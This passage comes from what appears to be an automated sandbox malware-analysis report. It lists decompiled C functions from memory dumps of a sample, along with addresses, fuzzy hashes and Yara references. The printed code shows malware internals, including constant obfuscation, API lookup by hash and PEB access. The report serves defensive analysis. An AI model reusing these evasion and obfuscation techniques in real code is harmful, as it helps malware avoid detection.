						_v4 =  *((char*)(_t83 - 1));
						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
						_v4 = _v4 + (_v4 << (_v8 & 0x000000ff));
						_v4 = _v4 - _v4;
					} while ( *_t83 != 0);
				}
				return _v4;
			}

0x021e3ba3
0x021e3bab
0x021e3bb3
0x021e3bb7
0x021e3bbf
0x021e3bc7
0x021e3bcf
0x021e3bd7
0x021e3bdf
0x021e3be7
0x021e3bf3
0x021e3bf5
0x021e3bf9
0x021e3c01
0x021e3c09
0x021e3c11
0x021e3c19
0x021e3c1e
0x021e3c26
0x021e3c2e
0x021e3c36
0x021e3c3e
0x021e3c46
0x021e3c51
0x021e3c60
0x021e3c64
0x021e3c67
0x021e3c74
0x021e3c78
0x021e3c80
0x021e3c91
0x021e3c99
0x021e3ca1
0x021e3ca6
0x021e3cae
0x021e3cb6
0x021e3cbe
0x021e3cc6
0x021e3cce
0x021e3ce5
0x021e3ce9
0x021e3cef
0x021e3cf3
0x021e3cf7
0x021e3d01
0x021e3d0a

Strings

UI, xrefs: 021E3C09
UI, xrefs: 021E3C91

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: UI$UI
API String ID: 0-658841096
Opcode ID: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
Instruction ID: ca09a74da855f13ef4a127cf355f5ea86b8f50dc6913f2b316db2e03ba176eb0
Opcode Fuzzy Hash: 8fb8486042db03a29a3c642504b4275772910a8ab76727c30505b2b065e064e3
Instruction Fuzzy Hash: 7731DEB5509741AFD794CE29C64A60FBBF0BB84B24F44C95DE4E9831A4D3788909DF43

Uniqueness

Uniqueness Score: -1.00%

Function 00409C48, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00409C4D

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f557690f28c1f672e179aac3153d04dc0e65bf5786f1d79d99cffc9af07c7071
Instruction ID: 03bcb520bf2f563af268e7b5ec2d2dff604110816e44dfc8923e142131883431
Opcode Fuzzy Hash: f557690f28c1f672e179aac3153d04dc0e65bf5786f1d79d99cffc9af07c7071
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0060380E, Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

,, xrefs: 006038F5

Memory Dump Source

Source File: 00000000.00000002.230964663.0000000000600000.00000040.00000001.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-48859977
Opcode ID: f7fa7f053b15b3b9bc5260059ed6039f3f15b89ed0c9b9de4249ee0e0695fea7
Instruction ID: 76dc1d9bcdb8f57288703f23b1efbc5c72d894ca1d9bd0993052f9e820abab81
Opcode Fuzzy Hash: f7fa7f053b15b3b9bc5260059ed6039f3f15b89ed0c9b9de4249ee0e0695fea7
Instruction Fuzzy Hash: A7417A74A097019BC758EFA8D85512BB7E6BFC0310F00C92DE4D6873A0EB7899098F86

Uniqueness

Uniqueness Score: -1.00%

Function 021E1C70, Relevance: 1.4, Strings: 1, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E021E1C70(void* __ecx) {
				char _v4;
				signed int _v8;
				signed int _v12;
				void* __ebx;
				void* __ebp;
				intOrPtr* _t57;
				signed int _t58;
				intOrPtr* _t64;
				signed int _t65;
				intOrPtr* _t67;
				int _t73;
				void* _t78;
				signed int _t80;
				signed int _t91;
				void* _t110;
				void* _t114;
				void* _t115;
				signed int _t117;
				signed int* _t118;

				_t118 =  &_v12;
				_v8 = 0xac2a;
				_v8 = _v8 ^ 0xfb427452;
				_v8 = _v8 | 0x0433d0b5;
				_v8 = _v8 ^ 0xff73d8f5;
				_v12 = 0xb90d;
				_v12 = _v12 + 0xffffc883;
				_v12 = _v12 + 0xffff4556;
				_v12 = _v12 + 0xffff66fa;
				_v12 = _v12 + 0xffff302a;
				_v12 = _v12 + 0xffffad71;
				_v12 = _v12 << 0xc;
				_v12 = _v12 ^ 0xe0b7b010;
				_t57 =  *0x21edd4c;
				_t114 = __ecx;
				if(_t57 == 0) {
					_t57 = E021E3E80(_t78, E021E3F20(0xbb398380), 0xae3c1a47, _t115);
					 *0x21edd4c = _t57;
				}
				_t58 =  *_t57();
				_v12 = 0x788;
				_v12 = _v12 >> 0xc;
				_t117 = _v8 + _t58 % _v12;
				_v12 = _v12 + 0xffff671b;
				_v12 = _v12 ^ 0x6acd08c3;
				_v12 = _v12 * 0x32;
				_v12 = _v12 + 0xffff2d32;
				_v12 = _v12 ^ 0x491450b8;
				_v12 = (_v12 - (0x29e4129f * _v12 >> 0x20) >> 1) + (0x29e4129f * _v12 >> 0x20) >> 6;
				_v12 = _v12 ^ 0x00f88eb6;
				_v8 = 0x2ce8;
				_v8 = _v8 + 0xffffe7d1;
				_v8 = _v8 * 0x4b;
				_v8 = _v8 + 0x84e;
				_v8 = _v8 ^ 0x00061a91;
				_t64 =  *0x21edd4c;
				if(_t64 == 0) {
					_t64 = E021E3E80(_t78, E021E3F20(0xbb398380), 0xae3c1a47, _t117);
					 *0x21edd4c = _t64;
				}
				_t65 =  *_t64();
				_t67 =  *0x21edd4c;
				_t80 = _v12 + _t65 % _v8;
				if(_t67 == 0) {
					_t67 = E021E3E80(_t80, E021E3F20(0xbb398380), 0xae3c1a47, _t117);
					 *0x21edd4c = _t67;
				}
				_v4 =  *_t67();
				if(_t117 != 0) {
					_t110 = _t114;
					_t91 = _t117 >> 1;
					_t114 = _t114 + _t117 * 2;
					_t73 = memset(_t110, 0x2d002d, _t91 << 2);
					asm("adc ecx, ecx");
					memset(_t110 + _t91, _t73, 0);
					_t118 =  &(_t118[6]);
				}
				E021E4ED0(_t114, _t80,  &_v4);
				 *((short*)(_t114 + _t80 * 2)) = 0;
				return 0;
			}

0x021e1c70
0x021e1c73
0x021e1c7b
0x021e1c83
0x021e1c8b
0x021e1c93
0x021e1c9a
0x021e1ca1
0x021e1ca8
0x021e1caf
0x021e1cb6
0x021e1cbd
0x021e1cc1
0x021e1cc8
0x021e1cd0
0x021e1cd4
0x021e1ce7
0x021e1cec
0x021e1cec
0x021e1cf1
0x021e1cff
0x021e1d07
0x021e1d0c
0x021e1d0e
0x021e1d16
0x021e1d23
0x021e1d2c
0x021e1d34
0x021e1d4b
0x021e1d4f
0x021e1d57
0x021e1d5f
0x021e1d6c
0x021e1d70
0x021e1d78
0x021e1d80
0x021e1d87
0x021e1d9a
0x021e1d9f
0x021e1d9f
0x021e1da4
0x021e1db2
0x021e1db7
0x021e1dbb
0x021e1dce
0x021e1dd3
0x021e1dd3
0x021e1dda
0x021e1de0
0x021e1de5
0x021e1de7
0x021e1de9
0x021e1df1
0x021e1df3
0x021e1df5
0x021e1df5
0x021e1df8
0x021e1e02
0x021e1e0c
0x021e1e16

Strings

,, xrefs: 021E1D57

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-48859977
Opcode ID: cb965e9d1ffdca10bc4405ca3cde5c72757ed40813a8de6ee80485c01366e47e
Instruction ID: 682a7d2f93708001997d40b74bd7a77e0cb268ef3457b8d07d2131ab55021d74
Opcode Fuzzy Hash: cb965e9d1ffdca10bc4405ca3cde5c72757ed40813a8de6ee80485c01366e47e
Instruction Fuzzy Hash: 89415E75A487029FCB48EF68D81416FB7E6BBC4214F048D2DE4D68B250EB749D058F82

Uniqueness

Uniqueness Score: -1.00%

Function 0060095E, Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.230964663.0000000000600000.00000040.00000001.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
Instruction ID: ce7317627156032a5e07683a2563f85ad7273ba7b7fdacdf46333d40a27bf402
Opcode Fuzzy Hash: 4003efdb1b82660489297cf81d9eb3b1a92828f19abc9c79053ce197bdd8e6b4
Instruction Fuzzy Hash: B6F12E74A40209EFEB08CF94C990BAEB7B2FF48304F208559E906AB385D771EE41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00408293, Relevance: .3, Instructions: 259
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00408293(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
							 *_t270 =  *_t270 - 1;
							if( *_t270 == 0) {
								 *_a4 =  *_a4 & _t221;
							}
						}
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
					_v8 = _v8 + _a12 - _t292;
					if(_v8 <= 0) {
						_t277 = _a8;
					} else {
						_t290 = (_v8 >> 4) - 1;
						_t256 = _a8 + _t292 - 4;
						if(_t290 > 0x3f) {
							_t290 = 0x3f;
						}
						_t207 = _v16 + _t290 * 8;
						_a12 = _t207;
						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
						_t209 = _a12;
						 *(_t256 + 8) = _t209;
						 *((intOrPtr*)(_t209 + 4)) = _t256;
						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
							_a15 = _t258;
							_t259 = _t258 + 1;
							 *((char*)(_t290 + _t186 + 4)) = _t259;
							if(_t259 >= 0) {
								__eflags = _a15;
								if(_a15 == 0) {
									_t84 = _t290 - 0x20; // -33
									_t262 = _a4;
									_t86 = _t262 + 4;
									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
									__eflags =  *_t86;
								}
								_t193 = _t186 + 0xc4 + _t274 * 4;
								_t91 = _t290 - 0x20; // -33
								_t260 = _t91;
								_t278 = 0x80000000;
							} else {
								if(_a15 == 0) {
									 *_a4 =  *_a4 | 0x80000000 >> _t290;
								}
								_t193 = _t186 + 0x44 + _t274 * 4;
								_t278 = 0x80000000;
								_t260 = _t290;
							}
							 *_t193 =  *_t193 | _t278 >> _t260;
						}
						_t277 = _a8;
						_t257 = _v8;
						_t192 = _t277 + _t292 - 4;
						 *_t192 = _t257;
						 *(_t257 + _t192 - 4) = _t257;
					}
					_t191 = _t292 + 1;
					 *((intOrPtr*)(_t277 - 4)) = _t191;
					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
					goto L52;
				}
			}

0x00408299
0x004082a2
0x004082ad
0x004082b0
0x004082b3
0x004082c5
0x004082cb
0x004082ce
0x004082d1
0x004082d5
0x004082d9
0x004082dc
0x00408441
0x00408447
0x0040844a
0x0040844d
0x00408450
0x00408453
0x0040845a
0x00408460
0x00408461
0x00408464
0x00408467
0x0040846b
0x0040846b
0x0040846c
0x00408470
0x0040847c
0x0040847d
0x00408480
0x00408484
0x00408484
0x00408488
0x0040848b
0x0040848d
0x00408490
0x004084b0
0x004084ba
0x004084ba
0x004084be
0x004084c0
0x004084c7
0x004084c7
0x004084c9
0x004084cb
0x004084ce
0x004084ce
0x004084ce
0x004084ce
0x00408492
0x0040849b
0x0040849f
0x004084a1
0x004084a5
0x004084a5
0x004084a7
0x004084ac
0x004084ac
0x004084a7
0x004084d1
0x004084d1
0x004084da
0x004084e3
0x004084e9
0x004084ec
0x004084f2
0x004084f3
0x004084f6
0x004084fa
0x004084fa
0x004084f6
0x004084fb
0x00408502
0x00408505
0x00408508
0x0040850b
0x00408511
0x00408517
0x0040851a
0x0040851c
0x00408520
0x00408523
0x00408526
0x00408526
0x00408528
0x0040852c
0x0040854f
0x00408553
0x0040855f
0x00408562
0x00408562
0x00408562
0x00408562
0x00408565
0x0040856c
0x0040856f
0x0040852e
0x0040852e
0x00408532
0x0040853d
0x00408540
0x00408540
0x00408540
0x00408542
0x00408546
0x0040854b
0x0040854b
0x00408576
0x00408576
0x00408576
0x00408578
0x0040857b
0x0040857d
0x0040857d
0x00408581
0x00408583
0x00000000
0x00408583
0x004082e5
0x00000000
0x004082f5
0x004082fb
0x004082ff
0x00408302
0x00408306
0x00408307
0x00408307
0x00408310
0x00408315
0x00408343
0x00408347
0x00408349
0x00408350
0x00408350
0x00408352
0x00408354
0x00408357
0x00408357
0x00408357
0x00408357
0x00408317
0x00408321
0x00408325
0x00408327
0x0040832b
0x0040832d
0x00408332
0x00408332
0x0040832d
0x00408315
0x00408360
0x00408369
0x00408371
0x00408378
0x00408428
0x0040837e
0x00408387
0x00408388
0x0040838f
0x00408393
0x00408393
0x00408397
0x0040839a
0x004083a0
0x004083a3
0x004083a6
0x004083a9
0x004083af
0x004083b8
0x004083ba
0x004083c1
0x004083c4
0x004083c6
0x004083ca
0x004083ed
0x004083f1
0x004083f3
0x004083fd
0x00408400
0x00408400
0x00408400
0x00408400
0x00408403
0x0040840a
0x0040840a
0x0040840d
0x004083cc
0x004083d0
0x004083de
0x004083de
0x004083e0
0x004083e4
0x004083e9
0x004083e9
0x00408414
0x00408414
0x00408416
0x00408419
0x0040841c
0x00408420
0x00408422
0x00408422
0x0040842b
0x0040842e
0x00408431
0x00000000
0x00408431

Memory Dump Source

Source File: 00000000.00000002.230444937.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.230441261.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230487967.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.230497031.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230501366.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.230506081.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction ID: 00de992f94577e55d0855a628cf5fc13367e092eab98b966cb86fa3571df6218
Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
Instruction Fuzzy Hash: 32B1603590021ADFDB15CF04C6D0AA9BBA1FB54318F14C1AED8596B382DB35EA42CB94

Uniqueness

Uniqueness Score: -1.00%

Function 006069BE, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.230964663.0000000000600000.00000040.00000001.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 021E4E20, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E021E4E20() {

				return  *[fs:0x30];
			}

0x021e4e26

Memory Dump Source

Source File: 00000000.00000002.231384792.00000000021E1000.00000020.00000001.sdmp, Offset: 021E0000, based on PE: true

Associated: 00000000.00000002.231376146.00000000021E0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231395549.00000000021ED000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.231403140.00000000021F0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_21e0000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00423382, Relevance: 42.5, APIs: 28, Instructions: 479
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00423382(intOrPtr __ecx) {
				int _t231;
				void* _t239;
				int _t240;
				void* _t260;
				void* _t267;
				void* _t268;
				CHAR* _t280;
				signed int _t336;
				int _t392;
				CHAR* _t407;
				signed int _t408;
				signed int _t409;
				int _t420;
				struct tagSIZE* _t421;
				int _t428;
				signed int _t437;
				int _t442;
				signed int _t446;
				void* _t447;
				int _t453;
				void* _t456;
				intOrPtr _t461;

				E00406520(E0042A9E0, _t456);
				_t461 =  *0x439c44; // 0x1
				 *((intOrPtr*)(_t456 - 0x50)) = __ecx;
				if(_t461 == 0) {
					_push(__ecx);
					E0041A41D(_t456 - 0x44, __eflags);
					 *(_t456 - 4) = 0;
					 *(_t456 - 0x30) = E00416528(__ecx);
					GetWindowRect( *(__ecx + 0x1c), _t456 - 0x28);
					OffsetRect(_t456 - 0x28,  ~( *(_t456 - 0x28)),  ~( *(_t456 - 0x24)));
					 *((intOrPtr*)(_t456 - 0x48)) = 0;
					 *((intOrPtr*)(_t456 - 0x4c)) = 0x42d72c;
					 *(_t456 - 4) = 1;
					E0041A611(_t456 - 0x4c, CreateSolidBrush(GetSysColor(6)));
					 *(_t456 - 0x5c) =  *(_t456 - 0x5c) & 0x00000000;
					 *((intOrPtr*)(_t456 - 0x60)) = 0x42d72c;
					 *(_t456 - 4) = 2;
					asm("sbb eax, eax");
					E0041A611(_t456 - 0x60, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 0xb)));
					 *(_t456 - 0x54) =  *(_t456 - 0x54) & 0x00000000;
					 *(_t456 - 0x58) = 0x42d72c;
					 *(_t456 - 4) = 3;
					asm("sbb eax, eax");
					E0041A611(_t456 - 0x58, CreateSolidBrush(GetSysColor( ~( *( *((intOrPtr*)(_t456 - 0x50)) + 0xc4)) + 3)));
					 *(_t456 - 0x10) = GetSystemMetrics(6);
					 *(_t456 - 0x14) = GetSystemMetrics(5);
					_t428 = GetSystemMetrics(0x21);
					_t231 = GetSystemMetrics(0x20);
					__eflags =  *(_t456 - 0x30) & 0x00040600;
					_t442 = _t231;
					if(( *(_t456 - 0x30) & 0x00040600) != 0) {
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
						InflateRect(_t456 - 0x28,  ~( *(_t456 - 0x14)),  ~( *(_t456 - 0x10)));
						E004232C5(_t456 - 0x44, _t456 - 0x28, _t442 -  *(_t456 - 0x14), _t428 -  *(_t456 - 0x10), _t456 - 0x60);
						_t407 =  &(( *(_t456 - 0x10))[ *(_t456 - 0x10)]);
						 *(_t456 - 0x74) = _t407;
						_t408 =  *(_t456 - 0x14);
						 *(_t456 - 0x18) = _t428 - _t407;
						_t336 = _t442 - _t408 + _t408;
						__eflags =  *(_t456 - 0x2f) & 0x00000002;
						 *(_t456 - 0x2c) = _t336;
						if(( *(_t456 - 0x2f) & 0x00000002) != 0) {
							_t409 =  *(_t456 - 0x18);
						} else {
							_t436 = _t428 -  *(_t456 - 0x74) +  *0x439c9c;
							_t455 = _t442 - _t408 + _t408 * 2 +  *0x439c98;
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c, _t336, 1, 0);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28),  *((intOrPtr*)(_t456 - 0x1c)) - _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *(_t456 - 0x24) + _t428 -  *(_t456 - 0x74) +  *0x439c9c,  *(_t456 - 0x2c), 1, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) -  *(_t456 - 0x2c),  *((intOrPtr*)(_t456 - 0x1c)) - _t436,  *(_t456 - 0x2c), 1, 0);
							_t437 =  *(_t456 - 0x18);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t442 - _t408 + _t408 * 2 +  *0x439c98,  *(_t456 - 0x24), 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *(_t456 - 0x28) + _t442 - _t408 + _t408 * 2 +  *0x439c98,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
							E00423F5E(_t456 - 0x44,  *((intOrPtr*)(_t456 - 0x20)) - _t455,  *((intOrPtr*)(_t456 - 0x1c)) - _t437, 1, _t437, 0);
							_t336 =  *(_t456 - 0x2c);
							_t409 = _t437;
						}
						InflateRect(_t456 - 0x28,  ~_t336,  ~_t409);
					}
					__eflags =  *(_t456 - 0x2e) & 0x000000c0;
					if(( *(_t456 - 0x2e) & 0x000000c0) == 0) {
						E004232C5(_t456 - 0x44, _t456 - 0x28,  *(_t456 - 0x14),  *(_t456 - 0x10), _t456 - 0x4c);
						goto L25;
					} else {
						asm("movsd");
						asm("movsd");
